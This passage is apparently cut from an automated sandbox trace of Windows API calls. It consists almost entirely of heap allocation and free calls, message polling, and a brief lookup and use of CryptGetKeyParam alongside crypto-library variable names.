0x6bb5e8 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9728, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.074] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.074] CryptGetKeyParam (in: hKey=0x6b8af8, dwParam=0x7, pbData=0x6bb548, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb548*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.075] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.076] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0e00 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.076] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.076] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8c38 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.078] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0e00 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.078] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.078] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.078] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bf8 | out: hHeap=0x650000) returned 1 [0075.078] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.079] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bf8 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.079] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.080] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.080] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.080] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8c38 | out: hHeap=0x650000) returned 1 [0075.080] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.080] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: 